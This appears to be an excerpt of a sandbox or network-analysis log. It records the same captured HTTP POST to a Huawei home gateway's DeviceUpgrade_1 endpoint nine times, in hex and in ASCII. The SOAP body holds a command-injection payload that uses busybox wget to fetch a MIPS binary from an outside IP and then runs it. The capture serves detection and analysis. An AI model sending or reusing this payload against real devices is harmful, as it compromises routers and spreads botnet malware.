Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
